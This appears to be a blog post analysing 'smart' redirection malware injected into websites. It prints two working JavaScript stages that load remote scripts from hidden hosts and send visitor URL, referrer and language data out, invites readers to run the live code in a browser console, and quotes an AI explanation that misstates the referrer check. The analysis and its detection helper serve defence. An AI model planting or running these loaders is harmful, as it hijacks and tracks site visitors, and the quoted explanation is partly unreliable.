Smart redirection malware

I have found this code:

    // Beautified from the minified one-liner as found; behaviour unchanged.
    !function (e, t) {
        // The expression inside Math.floor() was lost when the snippet was copied;
        // Date.now() / 1e3 is assumed here from the "current time in seconds" behaviour described below.
        var r = Math.floor(Date.now() / 1e3),
            n = r - r % 3600;                  // rounded down to the hour: the loader filename changes every hour
        // r is rounded to a 10-minute bucket and hex-encoded as a cache-buster;
        // direct visits (empty referrer) get nothing, so casual inspection sees no second stage
        if (r -= r % 600, r = r.toString(16), !document.referrer) return;
        let a = atob("anMub3B0dHJh" + "Y2tlci5vbmxpbmU=");   // split base64 literal, decodes to js.opttracker.online
        (t = e.createElement("script")).type = "text/javascript",
        t.async = !0,
        t.src = "https://" + a + "/event.min." + n + ".js?v=" + r,   // /event.min.<hour>.js?v=<hex bucket>
        e.getElementsByTagName("head")[0].appendChild(t);
    }(document);

At first it does not look very suspicious, and it is not detected by the Sucuri SiteCheck malware scanner.

To get things done faster, I asked ChatGPT to decipher this code for me:

The provided code appears to be JavaScript code that dynamically creates a script element and appends it to the head of an HTML document. Let’s break down the code step by step:

  • The code starts with a self-invoking anonymous function:

        !function(e,t){ ... }(document);

    This function is immediately invoked and passed the document object as an argument.

  • Inside the function, it calculates the current time in seconds since the Unix epoch (the number of seconds that have passed since January 1, 1970) and then rounds it down to the nearest hour:

        var r = Math.floor( / 1e3); // Get current time in seconds
        var n = r - (r % 3600);     // Round down to the nearest hour

  • It converts the r value to a hexadecimal string:

        r = r.toString(16);

  • It checks if there is no referrer for the current page. If there is no referrer, it proceeds with the following code. The referrer typically indicates the URL of the previous page that linked to the current page. If there is no referrer, it might be used to detect if the page was opened directly or as an entry point.

        if (!document.referrer) return;

  • It decodes a base64-encoded string and assigns it to the variable a. This decoded string appears to be a URL:

        let a = atob("anMub3B0dHJhY2tlci5vbmxpbmU=");

  • It creates a new script element t, sets its type to “text/javascript,” makes it asynchronous, and sets its source (the URL) based on the a variable and the n and r values. It uses the values to construct a dynamic URL with a version parameter:

        t = e.createElement("script");
        t.type = "text/javascript";
        t.async = true;
        t.src = "https://" + a + "/event.min." + n + ".js?v=" + r;

  • Finally, it appends the script element t to the head of the HTML document, effectively adding the external JavaScript file specified by the constructed URL to the page:

        e.getElementsByTagName("head")[0].appendChild(t);

In summary, this code is a way to dynamically load an external JavaScript file into a web page based on the current time and referrer. The purpose and content of the external JavaScript file specified by the URL constructed in this code are not provided in the code snippet.

Final result:

[root@cayenne ~]# curl -s
!function(e,t){const n="search_active",r=document.cookie;document.cookie=n+"=1;path=/";const o=document.referrer&&document.referrer.split("/").length>2?document.referrer.split("/")[2]:document.referrer;if(!o||-1!=r.indexOf(n))return;if(-1==o.indexOf("google.")&&-1==o.indexOf("bing.")&&-1==o.indexOf("facebook.")&&-1==o.indexOf("yahoo")&&-1==o.indexOf("instagram")&&-1==o.indexOf("naver")&&-1==o.indexOf("pinterest"))return;const c=atob("c3BmLmpzLW1pbi5zaXRl");(t=e.createElement("script")).type="text/javascript",t.async=!0;let i=[];i.rr="tcgs3a7w",i.u=window.location.href,i.r=document.referrer,i.l=window.navigator.language,t.src="https://"+c+"/?"+btoa(function(e){const t=[];for(let n in e)t.push(encodeURIComponent(n)+"="+encodeURIComponent(e[n]));return t.join("&")}(i)),e.getElementsByTagName("head")[0].appendChild(t)}(document);
[root@cayenne ~]#

This is how the malware is “smart”: it sets a search_active cookie on the first visit and bails out whenever that cookie is already present, so it does not redirect the same visitor more than once, and it only fires at all when the referrer host is a search engine or social network from its list.
It does a very good job of hiding itself by using cookies, the referrer, the User-Agent and other data.
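The two stages above share a recognisable shape: a base64-encoded hostname (split across two literals in the first stage), a referrer check, and a dynamically injected script. The helper below is an added example, not code from this post; it joins and decodes the hidden hostnames, flags scripts with that shape, and reads back the btoa()-encoded beacon the second stage sends, using sample inputs constructed from the page's snippets (the Date.now() term in the first snippet is assumed, since it was lost in the copy).

```javascript
// Static-triage helper for this loader family (added example, not the post's code).
// Sample inputs are constructed from the two snippets on the page; Date.now() is assumed.
const STAGE1 = '!function(e,t){var r=Math.floor(Date.now()/1e3),n=r-r%3600;if(r-=r%600,r=r.toString(16),!document.referrer)return;let a=atob("anMub3B0dHJh" + "Y2tlci5vbmxpbmU=");(t=e.createElement("script")).type="text/javascript",t.async=!0,t.src="https://"+a+"/event.min."+n+".js?v="+r,e.getElementsByTagName("head")[0].appendChild(t)}(document);';
const STAGE2_FRAGMENT = 'const o=document.referrer&&document.referrer.split("/").length>2?document.referrer.split("/")[2]:document.referrer;if(!o||-1!=r.indexOf(n))return;const c=atob("c3BmLmpzLW1pbi5zaXRl");(t=e.createElement("script")).type="text/javascript";';

// atob( "lit" + "lit" ... ): group 1 is the whole run of concatenated string literals,
// so a hostname split with "+" to defeat a plain grep is still recovered.
const ATOB_RE = /atob\(\s*((?:["'][A-Za-z0-9+\/=]*["']\s*(?:\+\s*)?)+)\)/g;

// Joins the split literals inside every atob() call and base64-decodes them.
function hiddenStrings(src) {
  const out = [];
  for (const m of src.matchAll(ATOB_RE)) {
    const joined = [...m[1].matchAll(/["']([A-Za-z0-9+\/=]*)["']/g)].map(x => x[1]).join('');
    out.push(Buffer.from(joined, 'base64').toString('utf8'));
  }
  return out;
}

// Flags a script when a decoded hostname feeds a dynamically created <script>;
// referrerGated is reported separately because benign analytics also read the referrer.
function triage(src) {
  const hiddenHosts = hiddenStrings(src).filter(s => /^[a-z0-9.-]+\.[a-z]{2,}$/i.test(s));
  const referrerGated = /document\.referrer/.test(src);
  const injectsScript = /createElement\(\s*["']script["']\s*\)/.test(src);
  return { hiddenHosts, referrerGated, injectsScript,
           suspicious: hiddenHosts.length > 0 && injectsScript };
}

// Reverses the second stage's beacon: https://<host>/?<base64 of k=v&k=v...>.
function decodeBeacon(url) {
  const fields = {};
  const qs = Buffer.from(new URL(url).search.slice(1), 'base64').toString('utf8');
  for (const pair of qs.split('&')) {
    const [k, v] = pair.split('=');
    fields[decodeURIComponent(k)] = decodeURIComponent(v);
  }
  return fields;
}

// Constructed sample: the beacon the second stage would build for a visitor arriving from a search.
function sampleBeacon() {
  const i = { rr: 'tcgs3a7w', u: 'https://example.com/page', r: 'https://www.google.com/', l: 'en-US' };
  const qs = Object.entries(i).map(([k, v]) => encodeURIComponent(k) + '=' + encodeURIComponent(v)).join('&');
  return 'https://' + hiddenStrings(STAGE2_FRAGMENT)[0] + '/?' + Buffer.from(qs).toString('base64');
}

console.log(triage(STAGE1), decodeBeacon(sampleBeacon()));
```

Run over a site's theme and plugin JavaScript, the decoded hostnames are the indicators to block at the proxy or DNS layer, and the beacon decoder turns a single logged request into the visitor's landing URL, referrer and language.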

If you want to see for yourself what this malware does, open Google in an incognito window, do a search, open any website and paste the code into the console (Inspect Element).
You will be redirected. If you repeat this a few times, even with a fresh incognito window, you will see that you are no longer redirected. Probably the site is tracking the IP address as well, among other parameters.